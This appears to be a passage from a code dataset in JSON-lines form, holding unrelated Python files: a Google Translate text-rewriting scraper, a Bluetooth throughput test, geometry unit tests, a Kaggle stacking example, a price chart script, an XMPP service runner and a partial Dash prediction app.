baseUrl += 'kc=2&'\n baseUrl += 'tk=' + str(tk) + '&'\n content=urllib.parse.quote(text)\n baseUrl += 'q=' + content\n return baseUrl\n\n def getHtml(self, session, url, headers):\n try:\n html = session.get(url, headers=headers)\n return html.json()\n except Exception as e:\n return None\n\n def translate(self, from_lan, to_lan, text):\n tk = self.getTk(text)\n url = self.buildUrl(text, tk, from_lan, to_lan)\n result = self.getHtml(self.session, url, self.headers)\n if result is not None:\n ans = \"\"\n s=''\n try:\n for i in result[0]:\n if i[0] is not None:\n s += i[0]\n for i in s.split('\n'):\n ans += i\n except TypeError as err:\n pass\n return ans\n else:\n try:\n self.logger.info('Google translation failed')\n except AttributeError as err:\n pass\n return None\n\n def split_article(self, article):\n sentences = self.split_re.split(article)\n text = \"\"\n ai_text = \"\"\n while sentences:\n text_len = len(text)\n if text_len < self.word_limit:\n t = sentences.pop(0)\n text += t.strip()\n if text_len >= self.word_limit or not sentences:\n ai_text += self.ai_article(text)\n text = \"\"\n return self.make_dl(ai_text)\n\n def ai_article(self, text):\n if not isinstance(text, str):\n return\n zh_en = self.translate('zh-CN', 'en', text)\n if not zh_en:\n return text\n en_zh = youdao(zh_en)\n # en_zh = self.translate(zh_en, \"en\", \"zh-CN\")\n return en_zh if en_zh else text\n\n def make_dl(self, text):\n new_text = self.sent_end.sub('\g<1>\n', text)\n sentences = re.split(r'\n', new_text)\n new_article = \"\"\n p_text = \"\"\n for t in sentences:\n if len(p_text) > self.dl_words:\n new_article += f'{p_text}\n' # the markup that originally wrapped each chunk was lost in extraction\n p_text = t # start the next chunk with the current sentence instead of dropping it\n continue\n p_text += t\n else:\n new_article += f'{p_text}\n'\n return new_article\n\ndef google(text):\n '''\n Google translation\n :param text:\n :return:\n '''\n g = translate_google()\n res = g.split_article(text)\n return res\n\nif __name__ == '__main__':\n text = \"\"\n with open('dome.txt', 'r', encoding='utf-8') as f:\n text = f.read()\n # print(text)\n res = google(text)\n print('Result: {}'.format(res))","sub_path":"wp_spider/translate/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":5986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"337372750","text":"# Lint as: python3\n\"\"\"Tests for blueberry.tests.bluetooth.bluetooth_throughput.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport math\n\nfrom mobly import asserts\nfrom mobly import test_runner\nfrom mobly.controllers.android_device_lib.jsonrpc_client_base import ApiError\nfrom mobly.signals import TestAbortClass\n# Internal import\nfrom blueberry.utils import blueberry_base_test\nfrom blueberry.utils import metrics_utils\n# Internal import\n\n\nclass BluetoothThroughputTest(blueberry_base_test.BlueberryBaseTest):\n\n @retry.logged_retry_on_exception(\n retry_intervals=retry.FuzzedExponentialIntervals(\n initial_delay_sec=2, factor=5, num_retries=5, max_delay_sec=300))\n def _measure_throughput(self, num_of_buffers, buffer_size):\n \"\"\"Measures the throughput of a data transfer.\n\n Sends data from the client device that is read by the server device.\n Calculates the throughput for the transfer.\n\n Args:\n num_of_buffers: An integer value designating the number of buffers\n to be sent.\n buffer_size: An integer value designating the size of each buffer,\n in bytes.\n\n Returns:\n The throughput of the transfer in bytes per second.\n \"\"\"\n\n # TODO(user): Need to fix throughput send/receive methods\n (self.phone.sl4a\n .bluetoothConnectionThroughputSend(num_of_buffers, buffer_size))\n\n throughput = (self.derived_bt_device.sl4a\n .bluetoothConnectionThroughputRead(num_of_buffers,\n buffer_size))\n return throughput\n\n def _throughput_test(self, buffer_size, test_name):\n logging.info('throughput test with buffer_size: %d and testname: %s',\n buffer_size, test_name)\n metrics = {}\n throughput_list = []\n num_of_buffers = 1\n for _ in range(self.iterations):\n throughput = self._measure_throughput(num_of_buffers, buffer_size)\n logging.info('Throughput: %d bytes-per-sec', throughput)\n throughput_list.append(throughput)\n\n metrics['data_transfer_protocol'] = self.data_transfer_type\n metrics['data_packet_size'] = buffer_size\n metrics['data_throughput_min_bytes_per_second'] = int(\n min(throughput_list))\n metrics['data_throughput_max_bytes_per_second'] = int(\n max(throughput_list))\n metrics['data_throughput_avg_bytes_per_second'] = int(\n math.fsum(throughput_list) / float(len(throughput_list)))\n\n logging.info('Throughput at large buffer: %s', metrics)\n\n 
asserts.assert_true(metrics['data_throughput_min_bytes_per_second'] > 0,\n 'Minimum throughput must be greater than 0!')\n\n self.metrics.add_test_metrics(metrics)\n for metric in metrics:\n self.record_data({\n 'Test Name': test_name,\n 'sponge_properties': {\n metric: metrics[metric],\n }\n })\n self.record_data({\n 'Test Name': test_name,\n 'sponge_properties': {\n 'proto_ascii':\n self.metrics.proto_message_to_ascii(),\n 'primary_device_build':\n self.phone.get_device_info()['android_release_id']\n }\n })\n\n def setup_class(self):\n \"\"\"Standard Mobly setup class.\"\"\"\n super(BluetoothThroughputTest, self).setup_class()\n if len(self.android_devices) < 2:\n raise TestAbortClass(\n 'Not enough android phones detected (need at least two)')\n self.phone = self.android_devices[0]\n\n # We treat the secondary phone as a derived_bt_device in order for the\n # generic script to work with this android phone properly. Data will be sent\n # from first phone to the second phone.\n self.derived_bt_device = self.android_devices[1]\n self.phone.init_setup()\n self.derived_bt_device.init_setup()\n self.phone.sl4a_setup()\n self.derived_bt_device.sl4a_setup()\n self.set_btsnooplogmode_full(self.phone)\n self.set_btsnooplogmode_full(self.derived_bt_device)\n\n self.metrics = (\n metrics_utils.BluetoothMetricLogger(\n metrics_pb2.BluetoothDataTestResult()))\n self.metrics.add_primary_device_metrics(self.phone)\n self.metrics.add_connected_device_metrics(self.derived_bt_device)\n\n self.data_transfer_type = metrics_pb2.BluetoothDataTestResult.RFCOMM\n self.iterations = int(self.user_params.get('iterations', 300))\n logging.info('Running Bluetooth throughput test %s times.', self.iterations)\n logging.info('Successfully found required devices.')\n\n def setup_test(self):\n \"\"\"Setup for bluetooth latency test.\"\"\"\n logging.info('Setup Test for test_bluetooth_throughput')\n super(BluetoothThroughputTest, self).setup_test()\n asserts.assert_true(self.phone.connect_with_rfcomm(self.derived_bt_device),\n 'Failed to establish RFCOMM connection')\n\n def test_bluetooth_throughput_large_buffer(self):\n \"\"\"Tests the throughput with large buffer size.\n\n Tests the throughput over a series of data transfers with large buffer size.\n \"\"\"\n large_buffer_size = 300\n test_name = 'test_bluetooth_throughput_large_buffer'\n self._throughput_test(large_buffer_size, test_name)\n\n def test_bluetooth_throughput_medium_buffer(self):\n \"\"\"Tests the throughput with medium buffer size.\n\n Tests the throughput over a series of data transfers with medium buffer\n size.\n \"\"\"\n medium_buffer_size = 100\n test_name = 'test_bluetooth_throughput_medium_buffer'\n self._throughput_test(medium_buffer_size, test_name)\n\n def test_bluetooth_throughput_small_buffer(self):\n \"\"\"Tests the throughput with small buffer size.\n\n Tests the throughput over a series of data transfers with small buffer size.\n \"\"\"\n small_buffer_size = 10\n test_name = 'test_bluetooth_throughput_small_buffer'\n self._throughput_test(small_buffer_size, test_name)\n\n def test_maximum_buffer_size(self):\n \"\"\"Calculates the maximum allowed buffer size for one packet.\"\"\"\n current_buffer_size = 300\n throughput = -1\n num_of_buffers = 1\n while True:\n logging.info('Trying buffer size %d', current_buffer_size)\n try:\n throughput = self._measure_throughput(\n num_of_buffers, current_buffer_size)\n logging.info('The throughput is %d at buffer size of %d', throughput,\n current_buffer_size)\n except ApiError:\n maximum_buffer_size = 
current_buffer_size - 1\n logging.info('Max buffer size: %d bytes', maximum_buffer_size)\n logging.info('Max throughput: %d bytes-per-second', throughput)\n self.record_data({\n 'Test Name': 'test_maximum_buffer_size',\n 'sponge_properties': {\n 'maximum_buffer_size': maximum_buffer_size\n }\n })\n return True\n current_buffer_size += 1\n\n def teardown_test(self):\n self.phone.sl4a.bluetoothSocketConnStop()\n self.derived_bt_device.sl4a.bluetoothSocketConnStop()\n\n def teardown_class(self):\n self.phone.factory_reset_bluetooth()\n self.derived_bt_device.factory_reset_bluetooth()\n logging.info('Factory resetting Bluetooth on devices.')\n super(BluetoothThroughputTest, self).teardown_class()\n\n\nif __name__ == '__main__':\n test_runner.main()\n","sub_path":"blueberry/tests/connectivity/bluetooth_throughput_test.py","file_name":"bluetooth_throughput_test.py","file_ext":"py","file_size_in_byte":7285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"440674103","text":"import torch\nfrom data import data_utils\nfrom data import bounding_volume\n\n\ndef test_ray_sphere_intersect():\n ray_origin = torch.tensor([[0.0,0.0,4.0],[0.0,0.0,-4.0],[0.0449, 1.0126, -0.4274]])\n ray_dir = torch.tensor([[0.0, 0.0, -1.0],[0.0, 0.0, -1.0],[0.2853, -0.6552, 0.6995]])\n sphere_center = torch.tensor([0.0,0.0,0.0])\n sphere_radius = 1.0\n # intersection points should be [3, 5] and [inf, inf]\n t = bounding_volume.ray_sphere_intersect(ray_origin, ray_dir, sphere_center, sphere_radius)\n print(t)\n\n\ndef test_ray_cube_intersect():\n ray_origin = torch.tensor([[0.0,0.0,4.0],[0.0,0.0,-4.0]])\n ray_dir = torch.tensor([[0.0, 0.0, -1.0],[0.0, 0.0, -1.0]])\n min_bound = torch.Tensor([-0.5, -0.5, -0.5])\n max_bound = torch.Tensor([0.5, 0.5, 0.5])\n # intersection points should be [3.5, 4.5] and [inf, inf]\n t = bounding_volume.ray_cube_intersect(ray_origin, ray_dir, min_bound, max_bound)\n print(t)\n\n\ndef check_coord_conv():\n origins = torch.tensor([[0.0,0.0,0.0],[0.0,0.0,0.0]])\n points = torch.tensor([[1.0,1.0,1.0],[0.0,0.0,-4.0]])\n rays = points - origins\n rays = rays / torch.norm(rays, dim=1)[:,None]\n angles = data_utils.cartesian_to_spherical(rays)\n print(angles)","sub_path":"src/unit_test/test_cases.py","file_name":"test_cases.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"223954253","text":"\n# coding: utf-8\n\n# In[17]:\n\n\ntrain\n\n\n# In[3]:\n\n\ndef feature_exploration_engineering_cleaning():\n import pandas as pd\n import numpy as np\n ID = 'id'\n TARGET = 'loss'\n NROWS = None\n DATA_DIR = \"../input\"\n\n TRAIN_FILE = \"{0}/train.csv\".format(DATA_DIR)\n TEST_FILE = \"{0}/test.csv\".format(DATA_DIR)\n\n train = pd.read_csv(TRAIN_FILE, nrows=NROWS) # id\tcat1\tcat2\tcat3\tcat4\tcat5\tcat6\tcat7\tcat8\tcat9\t...\tcont6\tcont7\tcont8\tcont9\tcont10\tcont11\tcont12\tcont13\tcont14\tloss\n test = pd.read_csv(TEST_FILE, nrows=NROWS) # same without loss (cat1-14 = A or B, contN = from 0.1 to 0.9, loss = from 1000 to 10000)\n\n y_train = train[TARGET].ravel() # convert Series->numpy.ndarray \n train.drop([ID, TARGET], axis=1, inplace=True) # delete 2 cols: 'id' and 'loss'\n test.drop([ID], axis=1, inplace=True)\n\n # print(\"{},{}\".format(train.shape, test.shape)) #(9, 130),(9, 130) * 9_rows 130_cols in each set\n\n ntrain = train.shape[0] # save 9 - rows count\n ntest = test.shape[0] # save 9 - rows count\n train_test = pd.concat((train, 
test)).reset_index(drop=True) # one big set 18 rows × 130 columns\n features = train.columns # get col names: Index(['cat1', 'cat2',..., 'cont14'], dtype='object', length=130)\n cats = [feat for feat in features if 'cat' in feat] # get col names starting from cat: ['cat1', 'cat2', ..., 'cat116']\n\n for feat in cats:\n train_test[feat] = pd.factorize(train_test[feat], sort=True)[0] # convert A/B -> 1/0 in all cols starting from 'cat'\n\n # print(train_test.head())\n x_train = np.array(train_test.iloc[:ntrain,:]) # select rows from 0 to 9, all cols, and convert to array\n x_test = np.array(train_test.iloc[ntrain:,:]) # select rows from 9 to end, all cols, and convert to array\n #x_train # ndarray of 9 elements-rows (each el - ndarray of 130 elements-cols)\n #x_test # same size\n #y_train # ndarray of 9 elements-float\n\n return x_train, y_train, x_test, ntrain, ntest\n\nx_train, y_train, x_test, ntrain, ntest = feature_exploration_engineering_cleaning()\n\nimport pandas as pd\nimport numpy as np\nimport xgboost as xgb\nfrom sklearn.model_selection import KFold \n# from sklearn.cross_validation import KFold # deprecated: \nfrom sklearn.ensemble import ExtraTreesRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_absolute_error\nNFOLDS = 4\nSEED = 0\nDATA_DIR = \"../input\"\nSUBMISSION_FILE = \"{0}/sample_submission.csv\".format(DATA_DIR)\net_params = {'n_jobs': -1, 'n_estimators': 100, 'max_features': 0.5, 'max_depth': 12, 'min_samples_leaf': 2,}\nrf_params = {'n_jobs': -1, 'n_estimators': 100, 'max_features': 0.2, 'max_depth': 8, 'min_samples_leaf': 2,}\nxgb_params = {'seed': 0, 'colsample_bytree': 0.7, 'silent': 1, 'subsample': 0.7, 'learning_rate': 0.075, 'objective': 'reg:linear', 'max_depth': 7, 'num_parallel_tree': 1, 'min_child_weight': 1, 'eval_metric': 'mae', 'nrounds': 350}\n\n\nclass SklearnWrapper(object):\n def __init__(self, clf, seed=0, params=None): # input -> NN + params, output -> NN + 2 functions\n params['random_state'] = seed\n self.clf = clf(**params)\n\n def train(self, x_train, y_train):\n self.clf.fit(x_train, np.log(y_train))\n\n def predict(self, x):\n return np.exp(self.clf.predict(x))\n\n\nclass XgbWrapper(object): # input -> params, output -> xgb + 2 functions\n def __init__(self, seed=0, params=None):\n self.param = params\n self.param['seed'] = seed\n self.nrounds = params.pop('nrounds', 250) # like pull, removes element with key 'nrounds' from dictionary. 250 - any number, doesn`t matter. Pop returns value of removed element\n\n def train(self, x_train, y_train):\n dtrain = xgb.DMatrix(x_train, label=np.log(y_train))\n self.gbdt = xgb.train(self.param, dtrain, self.nrounds)\n\n def predict(self, x):\n return np.exp(self.gbdt.predict(xgb.DMatrix(x)))\n\n\ndef get_oof(clf): # out-of-fold predictions, output-> 2 cols (each has 9 elements) with predictions: 1-oof_train (mean of all kfolds predictions for X_test), 2-oof_test common prediction of X_test (without splitting)\n\n # 3 empty results:\n oof_train = np.zeros((ntrain,)) # [ 0. 0. 0. 0. 0. 0. 0. 0. 0.]\n oof_test = np.zeros((ntest,)) # [ 0. 0. 0. 0. 0. 0. 0. 0. 
0.]\n oof_test_skf = np.empty((NFOLDS, ntest)) # np.empty((4, 9)) - random matrix 4rows x 9cols, each row = each loop of kfold\n\n kf = KFold(n_splits=NFOLDS, shuffle=True, random_state=SEED) # NFOLDS = 4 # kf = KFold(ntrain, n_folds=NFOLDS, shuffle=True, random_state=SEED) #old code depricated\n i = 0\n for train_index, test_index in kf.split(x_train,y_train): # creates 4 arrays of 9 indexes (each array divided into 2 parts randomly) len(x_train) = len(y_train) = 9 #for i, (train_index, test_index) in enumerate(kf): # depricated\n #print('train_index=',train_index,'test_index=',test_index) # 4 loops: train_index= [0 3 4 5 6 8] test_index= [1 2 7]\n x_tr = x_train[train_index] #len=6 short versin of x_train (6 instead 9)\n y_tr = y_train[train_index] #len=6 short versin of y_train (6 instead 9) \n x_te = x_train[test_index] #len=3 very short versin of x_train (without y_test?!?)\n\n clf.train(x_tr, y_tr) # train clf - 1 of 3 models: 1)xgb 2)ExtraTreesRegressor 3) RandomForestRegressor\n\n oof_train[test_index] = clf.predict(x_te) # ndarray, like y_test: 9 predicted values[0. 1703.43164062 2394.62524414 0. 0. 0. 0. 2668.16015625 0.]\n # x_te len = 3 [1 2 7], => oof_train has nulls in places [0 3 4 5 6]\n oof_test_skf[i, :] = clf.predict(x_test) # 4 (one for each kfold) elements -> each el = array 4lines x 9cols\n # if i==0: print(clf.predict(x_test)) #[ 1948 3779 1864 2086 1137 2864 1072 1452 3244]\n # print(len(x_test[0])) # 9 els, each has 130 els\n # Summary: we do 4 loops, each loop: input -> 9x130, output -> 4x9, cause this is empty matrix size limit\n i+=1\n # we have 2 results of loop -> oof_train (array[9], overwritten each kfold), oof_test_skf (like 4 oof_train)\n \n #print(oof_train) #[ 1845.48217773 1703.43164062 2394.62524414 2312.72216797 2512.66723633 2064.69555664 2777.49853516 2668.16015625 3149.6484375 ]\n #print(oof_test_skf) # like 4 oof_train\n oof_test[:] = oof_test_skf.mean(axis=0) # convert 4 rows -> 1 row, value = mean in col, cols coutn not changed\n #print(oof_test) # array[9]\n #print(oof_train.reshape(-1, 1)) # converts row -> col, result - col of 9 elements\n #print(oof_test.reshape(-1, 1)) # converts row -> col, result - col of 9 elements\n return oof_train.reshape(-1, 1), oof_test.reshape(-1, 1)\n\n# create 3 objects-models: 1)xgb 2)ExtraTreesRegressor 3) RandomForestRegressor\nxg = XgbWrapper(seed=SEED, params=xgb_params) # model 1 \"xgb\" (create simple object, but when we call train/predict it uses NN \"xgb\")\n # xg.nrounds # 350\n # xg.param # {'colsample_bytree': 0.7, 'eval_metric': 'mae', 'learning_rate': 0.075, 'max_depth': 7, 'min_child_weight': 1, 'num_parallel_tree': 1, 'objective': 'reg:linear', 'seed': 0, 'silent': 1, 'subsample': 0.7}\net = SklearnWrapper(clf=ExtraTreesRegressor, seed=SEED, params=et_params) #et.clf # ExtraTreesRegressor(bootstrap=False, criterion='mse', max_depth=12, ... warm_start=False)\nrf = SklearnWrapper(clf=RandomForestRegressor, seed=SEED, params=rf_params) #rf.clf # RandomForestRegressor(bootstrap=True, criterion='mse', max_depth=8, ... oob_score=False, random_state=0, verbose=0, warm_start=False)\n\nxg_oof_train, xg_oof_test = get_oof(xg)\n #xg_oof_train # array([[ 1845.48217773],[ 1703.43164062],[ 2394.62524414],[ 2312.72216797],[ 2512.66723633], ... [ 3149.6484375 ]])\n #xg_oof_test # array([[ 1884.30587769],[ 2589.99508667],[ 2078.14190674],[ 2734.7199707 ],[ 1669.76080322], ... 
[ 2155.86022949]])\net_oof_train, et_oof_test = get_oof(et)\nrf_oof_train, rf_oof_test = get_oof(rf)\n\nprint(\"XG-CV: {}\".format(mean_absolute_error(y_train, xg_oof_train)))\nprint(\"ET-CV: {}\".format(mean_absolute_error(y_train, et_oof_train)))\nprint(\"RF-CV: {}\".format(mean_absolute_error(y_train, rf_oof_train)))\n\n# combine all predictions - for all 3 models: from kfold and out of kfold\n# all train - from kfold, all test - without\nx_train = np.concatenate((xg_oof_train, et_oof_train, rf_oof_train), axis=1) # all trains: 3 cols, 9 rows\nx_test = np.concatenate((xg_oof_test, et_oof_test, rf_oof_test), axis=1) # all tests: 3 cols, 9 rows\nprint(\"{},{}\".format(x_train.shape, x_test.shape)) #(9, 3),(9, 3)\n\ndtrain = xgb.DMatrix(x_train, label=np.log(y_train))\ndtest = xgb.DMatrix(x_test)\n\ndef xg_eval_mae(yhat, dtrain):\n y = dtrain.get_label()\n return 'mae', mean_absolute_error(np.exp(y), np.exp(yhat))\n\nxgb_params = {'seed': 0, 'colsample_bytree': 0.8, 'silent': 1, 'subsample': 0.6, 'learning_rate': 0.01, 'objective': 'reg:linear', 'max_depth': 4, 'num_parallel_tree': 1, 'min_child_weight': 1, 'eval_metric': 'mae',}\n# These lines are assigning the value of best iteration from cv run (by early stopping 25 rounds) to be the number of iterations for actual training\nres = xgb.cv(xgb_params, dtrain, num_boost_round=500, nfold=4, seed=SEED, stratified=False,\n early_stopping_rounds=25, verbose_eval=10, show_stdv=True, feval=xg_eval_mae, maximize=False) #The first line does 4-fold cross-validation, outputs on each 10th iteration, and stops the training when the validation score does not improve for 25 iterations. \"res\" variable stores the record of this training.\n \nbest_nrounds = res.shape[0] - 1 # The second line reads the length of \"res\" array (which is equal to the number of training iterations after early stopping) and assigns it to \"best_nrounds\" to be used for training afterwards. Not sure that there should be \" - 1\" in line two because to the best of my knowledge the length of \"res\" variable is actually equal to the number of iterations where the validation score was the best. 
However, that \"-1\" should not change much in the final outcome.\ncv_mean = res.iloc[-1, 0]\ncv_std = res.iloc[-1, 1]\n\nprint('Ensemble-CV: {0}+{1}'.format(cv_mean, cv_std))\n\ngbdt = xgb.train(xgb_params, dtrain, best_nrounds)\n\nsubmission = pd.read_csv(SUBMISSION_FILE)\nsubmission.iloc[:, 1] = np.exp(gbdt.predict(dtest))\nsubmission.to_csv('result.sub.csv', index=None)\n\n\n# # EXAMPLES\n\n# ### 1) kfold\n\n# In[74]:\n\n\n# old KFOLD has additional parameter - n (we set length of indexes array manually)\n# this KFOLD gets length from X and y\n# GREAT MINUS - percent of train test - random !!!!\n\nfrom sklearn.model_selection import KFold\nX = np.array([[1, 2], [3, 4], [1, 2], [3, 4]])\ny = np.array([1, 2, 3, 4])\nkf = KFold(n_splits=3, shuffle=True, random_state=1)\n#kf.get_n_splits(X)\ni = 0\nfor train_index, test_index in kf.split(X,y):\n print(\"TRAIN:\", train_index, \"TEST:\", test_index, \"i:\", i)\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n i+=1\n\n# TRAIN: [0 1] TEST: [2 3] i: 0\n# TRAIN: [1 2 3] TEST: [0] i: 1\n# TRAIN: [0 2 3] TEST: [1] i: 2\n\n\n\n# ### 2) class\n\n# In[75]:\n\n\ntw_params = {\n 'xxx': 0,\n 'yyy': 'my_igrik',\n}\n\nclass TestWrapper(object):\n def __init__(self, seed=0, params=None):\n self.param = params\n self.test = seed\n def train(self, x_train, y_train):\n self.my_model = x_train + y_train\n def predict(self, x):\n return x*x\n \ntw = TestWrapper(seed=25, params=tw_params)\ntw.test # 25\ntw.param # {'xxx': 0, 'yyy': 'my_igrik'}\ntw.train(4,2)\ntw.my_model # 6\ntw.predict(3) # 9\n\n\n# ### 3) pop\n\n# In[99]:\n\n\n#remove element with key 'nrounds' from dictionary. 250 - any number, doesn`t matter. Pop returns value of removed element\nxgb_params2 = {\n 'min_child_weight': 1,\n 'eval_metric': 'mae',\n 'nrounds': 350\n}\nprint(len(xgb_params2)) # 3\nxgb_params2.pop('nrounds', 250) # 350 \nprint(len(xgb_params2)) # 2\n\n\n# In[14]:\n\n\nnp.empty((4, 9))\n\n","sub_path":"data_science/7_kaggle/cookbook/3_stacking/code/1_stacking_complex_example.py","file_name":"1_stacking_complex_example.py","file_ext":"py","file_size_in_byte":12410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"125736662","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\n\n# Author : JadeX\n# Time : 2020/1/21 21:33\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\ndata = pd.read_csv('tctest_02.csv')\n\nprice_free = 0\nprice_onedigit = 0\nprice_doubledigit = 0\nprice_threedigit = 0\nprice_fourdigit = 0\nprice_fivedigit = 0\n\nfor prices in data['price']:\n if prices == '免费' or '':\n price_free += 1\n else:\n if type(prices) == str:\n price_num = float(prices[1:])\n else:\n price_num = prices\n # 这里报错了很多次……因为提取到的价格的数值类型有str和float两种 所以处理方式也不一样\n\n if 0 < price_num < 10:\n price_onedigit += 1\n elif 10 <= price_num < 100:\n price_doubledigit += 1\n elif 100 <= price_num < 1000:\n price_threedigit += 1\n elif 1000 <= price_num < 10000:\n price_fourdigit += 1\n elif 10000 <= price_num:\n price_fivedigit += 1\n\nprint(price_free, price_onedigit, price_doubledigit, price_threedigit, price_fourdigit, price_fivedigit)\n\ncourse_price = ['免费', '一位数', '二位数', '三位数', '四位数', '五位数']\ncourse_counts = [price_free, price_onedigit, price_doubledigit, price_threedigit, price_fourdigit, price_fivedigit]\n\nplt.pie(course_counts,\n labels=course_price,\n startangle=0,\n explode=(0.1, 0, 0, 0, 0, 0.2)\n # , autopct='%1.0f%%'\n 
)\nplt.title('Tencent Classroom course price distribution')\nplt.show()\n\n\n\n\n\n\n\n","sub_path":"徐玥/徐玥_作业1/scrapytest_02/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"15974653","text":"'''\nCreated on Jul 8, 2013\n\n@author: pvicente\n'''\nfrom katoo import conf, KatooApp\nfrom katoo.rqtwisted import worker\nfrom katoo.supervisor import MetricsSupervisor, XMPPKeepAliveSupervisor\nfrom katoo.utils.applog import getLoggerAdapter, getLogger\nfrom katoo.utils.multiprocess import MultiProcess\nfrom katoo.utils.time import sleep\nimport os\n\napplication = KatooApp().app\n\nif conf.ADOPTED_STREAM is None:\n os.environ['ADOPTED_STREAM']='' # avoid running the MultiProcess service in child processes\n \n if conf.MULTIPROCESS>0:\n m=MultiProcess(__file__, number=conf.MULTIPROCESS)\n m.setServiceParent(application)\n\nmetrics_supervisor = MetricsSupervisor()\nmetrics_supervisor.setServiceParent(application)\n\nxmpp_keepalive_supervisor = XMPPKeepAliveSupervisor()\nxmpp_keepalive_supervisor.setServiceParent(application)\n\nif conf.REDIS_WORKERS > 0:\n worker.LOGGING_OK_JOBS = conf.LOGGING_OK_JOBS\n worker.SLEEP_CALL=sleep\n worker.MAX_RETRIES=conf.BACKEND_MAX_RETRIES\n worker.MAX_DELAY_TIME=conf.BACKEND_MAX_DELAY\n\n w=worker.Worker([conf.MACHINEID, conf.DIST_QUEUE_LOGIN, conf.DIST_QUEUE_RELOGIN], name=conf.MACHINEID,\n loops=conf.REDIS_WORKERS, default_result_ttl=conf.DIST_DEFAULT_TTL, default_warmup=conf.WORKER_WARMUP,\n default_enqueue_failed_jobs=conf.DIST_ENQUEUE_FAILED_JOBS,\n default_perform_job_in_thread=conf.DIST_PERFORM_JOB_IN_THREAD, default_thread_pool_size=conf.DIST_THREAD_POOL)\n\n w.log = getLoggerAdapter(getLogger('WORKER', level='INFO'), id='WORKER')\n w.setServiceParent(application)","sub_path":"runxmpp.py","file_name":"runxmpp.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"116884557","text":"# Imports from 3rd party libraries\nimport dash\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport pandas as pd\nimport numpy as np\n\n\n\n\n# Imports from this application\nfrom app import app\n\n\nimport pickle\n\npipeline = pickle.load(open('assets/last_model.sav', 'rb'))\n\n# 2 column layout. 
1st column width = 4/12\n# https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout\ncolumn1 = dbc.Col(\n [\n dcc.Markdown('## Predictions', className='mb-5'), \n dcc.Markdown('#### Latitude'), \n dcc.Slider(\n id = 'latitude',\n min=48.816990,\n max=48.900790,\n step=0.001,\n value=48.816990,\n marks = {48.816990: '48.816990', 48.900790: '48.900790'},\n className = 'mb-1' \n), \n \n dcc.Markdown('', id = 'out1'),\n \n dcc.Markdown('#### Longitude'),\n dcc.Slider(\n id = 'longitude',\n min=2.247990,\n max=2.427590,\n step=0.001,\n value=2.247990,\n marks = {2.247990: '2.247990', 2.427590: '2.427590'}, \n className = 'mb-1'\n),\n dcc.Markdown('', id = 'out2'),\n \n dcc.Markdown('#### Nights'), \n dcc.Dropdown(\n id='minimum_nights', \n options = [\n {'label': '1', 'value' : '1'}, {'label': '2', 'value' : '2'}, {'label': '3', 'value' : '3'}, \n {'label': '4', 'value' : '4'}, {'label': '5', 'value' : '5'}, {'label': '6', 'value' : '6'}, \n {'label': '7', 'value' : '7'}, {'label': '8', 'value' : '8'}, {'label': '9', 'value' : '9'},\n {'label': '10', 'value' : '10'}, {'label': '11', 'value' : '11'}, {'label': '12', 'value' : '12'},\n {'label': '13', 'value' : '13'}, {'label': '14', 'value' : '14'}, {'label': '15', 'value' : '15'},\n {'label': '16', 'value' : '16'}, {'label': '17', 'value' : '17'}, {'label': '18', 'value' : '18'},\n {'label': '19', 'value' : '19'}, {'label': '20', 'value' : '20'}, {'label': '21', 'value' : '21'},\n {'label': '22', 'value' : '22'}, {'label': '23', 'value' : '23'}, {'label': '24', 'value' : '24'},\n {'label': '25', 'value' : '25'}, {'label': '26', 'value' : '26'}, {'label': '27', 'value' : '27'},\n {'label': '28', 'value' : '28'}, {'label': '29', 'value' : '29'}, {'label': '30', 'value' : '30'},\n ], \n value = '1', \n className='mb-5', \n \n ), \n dcc.Markdown('#### Rent Type'), \n dcc.Dropdown(\n id='room_type', \n options = [\n {'label': 'Entire home/apt', 'value' : 'Entire home/apt'},\n {'label': 'Private room', 'value' : 'Private room'}, \n {'label': 'Hotel room', 'value' : 'Hotel room'}, \n {'label': 'Shared room', 'value' : 'Shared room'},\n ], \n value = 'Private room', \n className='mb-5', \n \n ), \n \n dcc.Markdown('#### Neighbourhood'), \n dcc.Dropdown(\n id='neighbourhood', \n options = [\n {'label': 'Buttes-Montmartre', 'value': 'Buttes-Montmartre'}, {'label': 'Popincourt', 'value': 'Popincourt'}, \n {'label': 'Entrepôt', 'value': 'Entrepôt'},{'label': 'Vaugirard', 'value': 'Vaugirard'}, \n {'label': 'Batignolles-Monceau', 'value': 'Batignolles-Monceau'}, {'label': 'Ménilmontant', 'value': 'Ménilmontant'}, \n {'label': 'Temple', 'value': 'Temple'}, {'label': 'Buttes-Chaumont', 'value': 'Buttes-Chaumont'}, \n {'label': 'Opéra', 'value': 'Opéra'}, {'label': 'Passy', 'value': 'Passy'},\n {'label': 'Bourse', 'value': 'Bourse'}, {'label': 'Reuilly', 'value': 'Reuilly'},\n {'label': 'Observatoire', 'value': 'Observatoire'}, {'label': 'Panthéon', 'value': 'Panthéon'},\n {'label': 'OHôtel-de-Ville', 'value': 'Hôtel-de-Ville'}, {'label': 'Luxembourg', 'value': 'Luxembourg'},\n {'label': 'Gobelins', 'value': 'Gobelins'}, {'label': 'Palais-Bourbon', 'value': 'Palais-Bourbon'},\n {'label': 'Élysée', 'value': 'Élysée'}, {'label': 'Louvre', 'value': 'Louvre'},\n ], \n value = 'Louvre', \n className='mb-5', \n ), \n ],\n 